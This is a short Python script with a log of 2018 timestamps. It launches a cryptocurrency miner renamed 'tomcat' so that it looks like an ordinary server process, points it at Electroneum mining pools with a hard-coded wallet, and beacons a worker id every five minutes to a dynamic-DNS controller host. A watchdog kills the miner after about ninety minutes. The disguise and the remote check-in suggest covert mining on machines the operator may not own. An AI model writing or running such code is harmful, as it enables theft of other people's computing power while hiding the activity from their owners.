import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:05.215586
#2018-02-17 16:02:05.555280
#2018-02-17 17:48:05.109754
#2018-02-17 19:36:01.330302
#2018-02-17 21:23:06.880413
#2018-02-17 23:07:01.556299
#2018-02-18 00:54:01.240465
#2018-02-18 02:42:07.986088
#2018-02-18 04:33:01.275734
#2018-02-18 06:24:06.282370
#2018-02-18 08:13:07.673141
#2018-02-18 10:01:01.604787
#2018-02-18 11:47:06.512576
#2018-02-18 13:32:03.886952
#2018-02-18 15:22:01.428962
#2018-02-18 17:11:01.493865
#2018-02-18 18:58:06.389913
#2018-02-18 20:45:04.223401
#2018-02-18 22:31:04.117337
#2018-02-19 00:19:07.249988
#2018-02-19 02:05:01.363148
#2018-02-19 03:52:01.532458
#2018-02-19 05:36:08.307015
#2018-02-19 07:25:03.728753
#2018-02-19 09:15:05.312180
#2018-02-19 11:04:09.077062
#2018-02-19 12:51:06.917379
#2018-02-19 14:39:08.808281
#2018-02-19 16:28:02.030828
#2018-02-19 18:15:02.939648
#2018-02-19 20:58:06.131054
#2018-02-19 22:46:04.496221
#2018-02-20 00:30:07.390516
#2018-02-20 02:17:07.818546
#2018-02-20 04:07:06.312477
#2018-02-20 05:50:08.468017
#2018-02-20 07:36:04.764701
#2018-02-20 09:21:05.449090
#2018-02-20 11:05:07.512699
#2018-02-20 12:51:09.391206
#2018-02-20 14:36:07.174396
#2018-02-20 16:20:03.970844
#2018-02-20 18:08:02.074013
#2018-02-20 19:58:08.961217
#2018-02-20 21:47:04.663886
#2018-02-20 23:28:06.178207
#2018-02-21 01:12:05.415345
#2018-02-21 03:01:06.937110
#2018-02-21 04:50:06.069591
#2018-02-21 06:36:04.139632
#2018-02-21 08:22:05.538574
#2018-02-21 10:07:08.729010
#2018-02-21 11:56:08.396949
#2018-02-21 13:46:05.384167
#2018-02-21 15:29:01.751944
#2018-02-21 17:19:01.735437
#2018-02-21 19:07:07.781468
#2018-02-21 20:54:06.392408
#2018-02-21 22:42:04.414046
#2018-02-22 00:31:03.810753
#2018-02-22 02:19:01.307387
#2018-02-22 04:06:07.186831
#2018-02-22 05:51:06.578271
#2018-02-22 07:38:07.820751
#2018-02-22 09:27:01.455567
#2018-02-22 11:13:05.726746
#2018-02-22 12:59:02.220403
#2018-02-22 14:47:02.159013
#2018-02-22 16:32:09.395253
#2018-02-22 18:19:08.119669
#2018-02-22 20:09:07.272319
#2018-02-22 21:57:03.996459
#2018-02-22 23:46:07.007181
#2018-02-23 01:35:06.807753
#2018-02-23 03:22:01.462158
#2018-02-23 05:08:01.407507
#2018-02-23 06:52:01.659593
#2018-02-23 08:41:08.238111
#2018-02-23 10:57:05.994215
#2018-02-23 12:53:08.635107
#2018-02-23 14:39:05.403176
#2018-02-23 16:28:10.671575
#2018-02-23 18:15:08.717496
#2018-02-23 20:00:07.577712
#2018-02-23 21:44:01.269024
#2018-02-23 23:38:04.539628
#2018-02-24 01:28:07.209211
#2018-02-24 03:19:05.357170
#2018-02-24 05:04:06.383925
#2018-02-24 06:54:07.397882
#2018-02-24 08:45:05.931140
#2018-02-24 10:56:03.540228
#2018-02-24 12:44:05.743892
#2018-02-24 14:34:01.653310
#2018-02-24 16:20:07.376220
#2018-02-24 18:14:07.014415
#2018-02-24 20:01:06.755092
#2018-02-24 21:44:03.667325
#2018-02-25 01:57:06.935327
#2018-02-25 05:49:01.803757
#2018-02-25 11:37:05.469833